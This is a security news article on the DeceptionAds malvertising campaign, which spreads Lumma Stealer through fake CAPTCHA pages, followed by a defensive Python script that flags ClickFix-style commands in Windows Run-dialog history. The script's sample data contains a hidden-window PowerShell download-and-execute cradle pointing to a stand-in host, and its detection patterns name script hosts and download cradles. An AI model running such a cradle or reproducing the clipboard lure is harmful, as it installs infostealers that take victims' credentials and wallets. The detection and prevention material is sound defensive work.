A sophisticated malvertising operation dubbed “DeceptionAds” has been discovered distributing the Lumma Stealer malware through deceptive CAPTCHA verification pages. The campaign, attributed to threat actor “Vane Viper,” generates over one million daily ad impressions across 3,000 websites using the Monetag advertising network.
Campaign Mechanics
The attack chain begins when a user clicks a pop-up ad promoting a fake offer or download. The BeMob cloaking service filters out researchers and crawlers and sends real victims to a fraudulent CAPTCHA page. When the victim clicks the fake "I'm not a robot" button, the page's JavaScript silently writes a PowerShell command to the clipboard and then instructs the victim to "verify" by pressing Win+R, Ctrl+V and Enter. That pastes the command into the Windows Run dialog and executes it, which fetches and runs the Lumma Stealer payload. Note that nothing in this chain exploits a browser or OS flaw: the victim performs the execution themselves, so download warnings, browser sandboxing and file-based reputation checks never come into play.
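Because the command is typed into the Run dialog rather than downloaded, the most direct host artifact is the Run-dialog history itself. Windows keeps it under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU: each value ("a", "b", ...) holds the command with a trailing "\1", and "MRUList" orders the values most-recent-first. The following Python script is an added example written for this article, not GuardioLabs' tooling or anything from the campaign itself. It parses a `reg export` of that key, reads the history in MRU order, and flags entries that look like ClickFix pastes. The export text, the indicator names and the host `example.invalid` are constructed for the example; the indicator patterns are heuristics, not a complete signature set.

```python
"""Triage Windows RunMRU history for ClickFix-style pasted commands.

Added example for this article; not code from GuardioLabs or the campaign.
The registry export below is constructed, as is the hostname example.invalid.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample of `reg export "HKCU\...\Explorer\RunMRU" runmru.reg`.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="\\\\fileserver\\share\\1"
"c"="powershell -w hidden -NoProfile -c \"iex (irm https://example.invalid/v)\" # I am not a robot - reCAPTCHA Verification ID: 1234\\1"
"MRUList"="cba"
'''

# Heuristic indicators for a pasted ClickFix command. Names are ours.
INDICATORS = {
    # a script host or LOLBin being launched from the Run box
    "script_host": re.compile(
        r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|certutil|bitsadmin|curl)(\.exe)?\b", re.I),
    # -w hidden / -WindowStyle Hidden so the victim sees no console
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    # -e/-ec/-enc/-EncodedCommand followed by a base64 blob
    "encoded_command": re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    # download-and-execute cradle or any URL in the command
    "download_cradle": re.compile(
        r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile)\b|https?://", re.I),
    # trailing comment used to make the Run box show a reassuring message
    "captcha_lure_comment": re.compile(r"#.*\b(robot|captcha|verif)", re.I),
}

REG_VALUE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"\s*$')


def unescape_reg(data: str) -> str:
    """Undo .reg string escaping: \\\\ becomes \\ and \\" becomes a quote."""
    return re.sub(r'\\(["\\])', r"\1", data)


def parse_reg_export(text: str) -> Dict[str, str]:
    """Collect "name"="data" string values from a .reg export."""
    values: Dict[str, str] = {}
    for line in text.splitlines():
        m = REG_VALUE.match(line.strip())
        if m:
            values[m.group("name")] = unescape_reg(m.group("data"))
    return values


def runmru_commands(values: Dict[str, str]) -> List[str]:
    """Return Run-dialog history, most recent first, without the \\1 suffix."""
    order = values.get("MRUList")
    keys = list(order) if order else sorted(k for k in values if k != "MRUList")
    cmds: List[str] = []
    for k in keys:
        data = values.get(k)
        if data is None:
            continue  # MRUList may reference a value that has been deleted
        cmds.append(data[:-2] if data.endswith("\\1") else data)
    return cmds


def score_command(cmd: str) -> List[str]:
    """Names of the indicators that match this command, in INDICATORS order."""
    return [name for name, pat in INDICATORS.items() if pat.search(cmd)]


def triage_runmru(text: str, min_hits: int = 2) -> List[Tuple[str, List[str]]]:
    """Flag history entries with at least min_hits indicators.

    A bare 'powershell' or 'cmd' in Run history is routine for admins, so a
    single hit is not reported by default.
    """
    flagged: List[Tuple[str, List[str]]] = []
    for cmd in runmru_commands(parse_reg_export(text)):
        hits = score_command(cmd)
        if len(hits) >= min_hits:
            flagged.append((cmd, hits))
    return flagged


if __name__ == "__main__":
    for cmd, hits in triage_runmru(SAMPLE_REG_EXPORT):
        print(f"[{', '.join(hits)}] {cmd}")
```

On the constructed sample only the `powershell -w hidden ...` entry is reported, with four indicators; `notepad` and the UNC path are left alone. In an investigation, pair the RunMRU hit with PowerShell script block logs (Event ID 4104) and process-creation events where `powershell.exe` or `mshta.exe` has `explorer.exe` as its parent, which is what a Run-dialog launch looks like.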
Lumma Stealer Capabilities
This advanced information-stealing malware targets:
– Browser data (cookies, credentials, passwords)
– Credit card information
– Cryptocurrency wallets and private keys
– Sensitive text files and documents
– Browser history from Chrome, Edge, Firefox, and other browsers
Campaign Impact and Response
GuardioLabs’ investigation led to:
– Monetag removing 200 malicious accounts
– BeMob taking action to stop the campaign
– Disruption of the campaign, although the operators were observed trying to resume it through other ad networks
Security Implications
The campaign is an evolution of the "ClickFix" tactic, in which a fake error or verification prompt talks the victim into running a command themselves. Earlier ClickFix lures relied on compromised or attacker-built sites; routing them through a legitimate ad network places them on thousands of sites the victim already visits and lets the operators rotate landing pages and accounts at scale. The stakes are not limited to individual users: credentials harvested by infostealers have been linked to large breaches in 2024, including those affecting Ticketmaster and AT&T.
Prevention Measures
Users should:
– Never execute commands that a website tells them to run; a real CAPTCHA never asks you to press keys outside the browser or open the Run dialog
– Avoid pirated software and illegal streaming sites, where these ads were concentrated
– Treat pop-up ads promising downloads, prizes or "verification" with suspicion, and use an ad blocker where possible
Organizations should:
– Disable the Run dialog for users who do not need it (Group Policy "Remove Run menu from Start Menu", which sets NoRun under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer and also blocks Win+R)
– Enable PowerShell script block logging (Event ID 4104) and alert on powershell.exe, mshta.exe or cmd.exe launched from explorer.exe with a hidden-window flag or a download cradle on the command line
– Assume that browser cookies and saved passwords on an infected machine are compromised: revoke sessions and rotate credentials rather than only removing the malware